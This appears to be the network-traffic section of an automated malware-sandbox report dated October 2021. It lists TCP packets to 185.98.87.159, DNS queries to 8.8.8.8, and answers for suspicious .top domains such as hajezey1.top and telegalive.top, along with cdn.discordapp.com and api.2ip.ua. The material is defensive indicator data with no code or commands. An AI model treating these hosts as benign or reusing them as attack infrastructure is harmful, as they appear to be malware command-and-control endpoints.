                                                  Oct 29, 2021 20:29:21.423639059 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.423669100 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.477245092 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477257967 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477293968 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477319956 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477344036 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477366924 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477390051 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477412939 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477437019 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477459908 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477483034 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477505922 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477530956 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477529049 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.477555037 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477581024 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477605104 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477627993 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477638960 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.477649927 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477674007 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477684021 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.477696896 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.477719069 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.477750063 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.531364918 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531394958 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531413078 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531429052 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531445980 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531461954 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531478882 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531495094 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531511068 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531527996 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531544924 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531549931 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.531560898 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531579018 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531596899 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531614065 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531630039 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531636953 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.531646967 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531665087 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531681061 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531697035 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531707048 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.531754971 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531773090 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531776905 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.531790018 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531805992 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.531846046 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.531898022 CEST4974980192.168.2.7185.98.87.159
                                                  Oct 29, 2021 20:29:21.531934023 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.561669111 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.561696053 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.561712980 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.561732054 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.561839104 CEST8049749185.98.87.159192.168.2.7
                                                  Oct 29, 2021 20:29:21.561856985 CEST8049749185.98.87.159192.168.2.7

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 29, 2021 20:29:20.838665962 CEST5464053192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:20.858174086 CEST53546408.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:20.869488001 CEST5873953192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:20.886290073 CEST53587398.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:21.035674095 CEST6033853192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:21.055284023 CEST53603388.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:21.198826075 CEST5871753192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:21.218452930 CEST53587178.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:24.045557976 CEST5976253192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:24.064831018 CEST53597628.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:24.233254910 CEST5432953192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:24.252674103 CEST53543298.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:40.908642054 CEST5805253192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:40.928164005 CEST53580528.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:41.073271036 CEST5400853192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:41.092096090 CEST53540088.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:41.237492085 CEST5945153192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:41.256978989 CEST53594518.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:41.405421019 CEST5291453192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:41.424346924 CEST53529148.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:41.578799009 CEST6456953192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:41.596255064 CEST53645698.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:43.609565020 CEST5281653192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:43.629235983 CEST53528168.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:43.776928902 CEST5078153192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:43.797700882 CEST53507818.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:43.944502115 CEST5423053192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:43.961450100 CEST53542308.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:44.112785101 CEST5491153192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:44.132520914 CEST53549118.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:46.378710985 CEST4995853192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:46.398327112 CEST53499588.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:47.086751938 CEST5086053192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:47.106415987 CEST53508608.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:47.332381964 CEST5045253192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:47.351737976 CEST53504528.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:51.277697086 CEST5973053192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:51.296569109 CEST53597308.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:51.466922045 CEST5931053192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:51.484147072 CEST53593108.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:51.638843060 CEST5191953192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:51.658396006 CEST53519198.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:51.959297895 CEST6429653192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:51.980878115 CEST53642968.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:54.015197992 CEST5668053192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:54.034465075 CEST53566808.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:54.182153940 CEST5882053192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:54.201314926 CEST53588208.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:54.354489088 CEST6098353192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:54.373887062 CEST53609838.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:54.526992083 CEST4924753192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:54.544733047 CEST53492478.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:54.702974081 CEST5228653192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:54.722946882 CEST53522868.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:56.520184040 CEST6374453192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:56.539890051 CEST53637448.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:56.689944029 CEST6145753192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:56.710153103 CEST53614578.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:56.868458033 CEST5836753192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:56.885906935 CEST53583678.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:57.027054071 CEST6059953192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:57.046030998 CEST53605998.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:57.194673061 CEST5957153192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:57.213768005 CEST53595718.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:29:59.856906891 CEST5268953192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:29:59.875693083 CEST53526898.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:00.296351910 CEST5029053192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:00.314217091 CEST53502908.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:00.473638058 CEST6042753192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:00.493067980 CEST53604278.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:01.354440928 CEST5620953192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:01.373661995 CEST53562098.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:05.054286957 CEST5958253192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:05.073163986 CEST53595828.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:05.295316935 CEST6094953192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:05.314948082 CEST53609498.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:06.119055033 CEST5854253192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:06.139359951 CEST53585428.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:06.424645901 CEST5917953192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:06.443312883 CEST53591798.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:06.687756062 CEST6092753192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:06.707096100 CEST53609278.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:09.077034950 CEST5785453192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:09.096445084 CEST53578548.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:09.297492981 CEST6202653192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:09.316358089 CEST53620268.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:09.509691954 CEST5945353192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:09.528799057 CEST53594538.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:09.724762917 CEST6246853192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:09.744049072 CEST53624688.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:09.952080965 CEST5256353192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:09.971429110 CEST53525638.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:10.313946009 CEST5472153192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:10.332926989 CEST53547218.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:11.558921099 CEST6282653192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:11.577822924 CEST53628268.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:11.754359961 CEST6204653192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:11.771446943 CEST53620468.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:15.527638912 CEST5122353192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:15.547036886 CEST53512238.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:18.902455091 CEST6390853192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:18.921991110 CEST53639088.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:22.334400892 CEST4922653192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:22.353709936 CEST53492268.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:27.885710001 CEST6021253192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:27.903482914 CEST53602128.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:31.228348970 CEST5886753192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:31.247653961 CEST53588678.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:34.597734928 CEST5086453192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:34.617084026 CEST53508648.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:34.653673887 CEST6150453192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:34.676328897 CEST53615048.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:41.096571922 CEST5009553192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:41.250916004 CEST53500958.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:30:41.696048975 CEST5965453192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:30:42.035584927 CEST53596548.8.8.8192.168.2.7
                                                  Oct 29, 2021 20:31:13.129337072 CEST5823353192.168.2.78.8.8.8
                                                  Oct 29, 2021 20:31:13.148866892 CEST53582338.8.8.8192.168.2.7

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Oct 29, 2021 20:29:20.838665962 CEST192.168.2.78.8.8.80x73d3Standard query (0)xacokuo8.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:20.869488001 CEST192.168.2.78.8.8.80x62d1Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:21.035674095 CEST192.168.2.78.8.8.80xf54eStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:21.198826075 CEST192.168.2.78.8.8.80x1388Standard query (0)privacytoolzforyou-6000.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:24.045557976 CEST192.168.2.78.8.8.80x69fdStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:24.233254910 CEST192.168.2.78.8.8.80xb52fStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:40.908642054 CEST192.168.2.78.8.8.80x8216Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:41.073271036 CEST192.168.2.78.8.8.80xd313Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:41.237492085 CEST192.168.2.78.8.8.80xb99cStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:41.405421019 CEST192.168.2.78.8.8.80x83ebStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:41.578799009 CEST192.168.2.78.8.8.80x3cdfStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:43.609565020 CEST192.168.2.78.8.8.80x3ebStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:43.776928902 CEST192.168.2.78.8.8.80xd47cStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:43.944502115 CEST192.168.2.78.8.8.80x96eeStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:44.112785101 CEST192.168.2.78.8.8.80x980dStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:46.378710985 CEST192.168.2.78.8.8.80x9259Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:47.086751938 CEST192.168.2.78.8.8.80x4d36Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:47.332381964 CEST192.168.2.78.8.8.80x4ceStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:51.277697086 CEST192.168.2.78.8.8.80x4bcbStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:51.466922045 CEST192.168.2.78.8.8.80x8cf9Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:51.638843060 CEST192.168.2.78.8.8.80x434aStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:51.959297895 CEST192.168.2.78.8.8.80x854bStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:54.015197992 CEST192.168.2.78.8.8.80x585eStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:54.182153940 CEST192.168.2.78.8.8.80x64a1Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:54.354489088 CEST192.168.2.78.8.8.80x649dStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:54.526992083 CEST192.168.2.78.8.8.80x6bc6Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:54.702974081 CEST192.168.2.78.8.8.80x9321Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:56.520184040 CEST192.168.2.78.8.8.80x3837Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:56.689944029 CEST192.168.2.78.8.8.80xfe70Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:56.868458033 CEST192.168.2.78.8.8.80xae88Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:57.027054071 CEST192.168.2.78.8.8.80x6041Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:57.194673061 CEST192.168.2.78.8.8.80xe76eStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:59.856906891 CEST192.168.2.78.8.8.80x5a82Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:00.296351910 CEST192.168.2.78.8.8.80x4ffaStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:00.473638058 CEST192.168.2.78.8.8.80x9edfStandard query (0)sysaheu90.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:01.354440928 CEST192.168.2.78.8.8.80xcd03Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:05.054286957 CEST192.168.2.78.8.8.80x2096Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:05.295316935 CEST192.168.2.78.8.8.80x6e42Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:06.119055033 CEST192.168.2.78.8.8.80x54c6Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:06.424645901 CEST192.168.2.78.8.8.80xf863Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:06.687756062 CEST192.168.2.78.8.8.80x8c61Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:09.077034950 CEST192.168.2.78.8.8.80x9b4Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:09.297492981 CEST192.168.2.78.8.8.80x737dStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:09.509691954 CEST192.168.2.78.8.8.80x828bStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:09.724762917 CEST192.168.2.78.8.8.80xf0a3Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:09.952080965 CEST192.168.2.78.8.8.80xae1eStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:10.313946009 CEST192.168.2.78.8.8.80x7b34Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:11.558921099 CEST192.168.2.78.8.8.80xd85dStandard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:11.754359961 CEST192.168.2.78.8.8.80x12c8Standard query (0)hajezey1.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:15.527638912 CEST192.168.2.78.8.8.80x14deStandard query (0)telegalive.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:18.902455091 CEST192.168.2.78.8.8.80xdc05Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:22.334400892 CEST192.168.2.78.8.8.80x934dStandard query (0)telegalive.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:27.885710001 CEST192.168.2.78.8.8.80x5456Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:31.228348970 CEST192.168.2.78.8.8.80xb3eeStandard query (0)telegalive.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:34.597734928 CEST192.168.2.78.8.8.80x3ba2Standard query (0)telegalive.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:34.653673887 CEST192.168.2.78.8.8.80x3666Standard query (0)toptelete.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:41.096571922 CEST192.168.2.78.8.8.80xcc51Standard query (0)nusurtal4f.netA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:30:41.696048975 CEST192.168.2.78.8.8.80x59aeStandard query (0)znpst.topA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:31:13.129337072 CEST192.168.2.78.8.8.80xaf84Standard query (0)api.2ip.uaA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Oct 29, 2021 20:29:20.858174086 CEST8.8.8.8192.168.2.70x73d3Name error (3)xacokuo8.topnonenoneA (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:20.886290073 CEST8.8.8.8192.168.2.70x62d1No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:21.055284023 CEST8.8.8.8192.168.2.70xf54eNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:21.218452930 CEST8.8.8.8192.168.2.70x1388No error (0)privacytoolzforyou-6000.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:24.064831018 CEST8.8.8.8192.168.2.70x69fdNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:24.252674103 CEST8.8.8.8192.168.2.70xb52fNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:40.928164005 CEST8.8.8.8192.168.2.70x8216No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:41.092096090 CEST8.8.8.8192.168.2.70xd313No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:41.256978989 CEST8.8.8.8192.168.2.70xb99cNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:41.424346924 CEST8.8.8.8192.168.2.70x83ebNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:41.596255064 CEST8.8.8.8192.168.2.70x3cdfNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:43.629235983 CEST8.8.8.8192.168.2.70x3ebNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:43.797700882 CEST8.8.8.8192.168.2.70xd47cNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:43.961450100 CEST8.8.8.8192.168.2.70x96eeNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:44.132520914 CEST8.8.8.8192.168.2.70x980dNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:46.398327112 CEST8.8.8.8192.168.2.70x9259No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:47.106415987 CEST8.8.8.8192.168.2.70x4d36No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:47.351737976 CEST8.8.8.8192.168.2.70x4ceNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:47.351737976 CEST8.8.8.8192.168.2.70x4ceNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:47.351737976 CEST8.8.8.8192.168.2.70x4ceNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:47.351737976 CEST8.8.8.8192.168.2.70x4ceNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:47.351737976 CEST8.8.8.8192.168.2.70x4ceNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:51.296569109 CEST8.8.8.8192.168.2.70x4bcbNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:51.484147072 CEST8.8.8.8192.168.2.70x8cf9No error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:51.658396006 CEST8.8.8.8192.168.2.70x434aNo error (0)hajezey1.top185.98.87.159A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:51.980878115 CEST8.8.8.8192.168.2.70x854bNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:51.980878115 CEST8.8.8.8192.168.2.70x854bNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:51.980878115 CEST8.8.8.8192.168.2.70x854bNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:51.980878115 CEST8.8.8.8192.168.2.70x854bNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                  Oct 29, 2021 20:29:51.980878115 CEST8.8.8.8192.168.2.70x854bNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
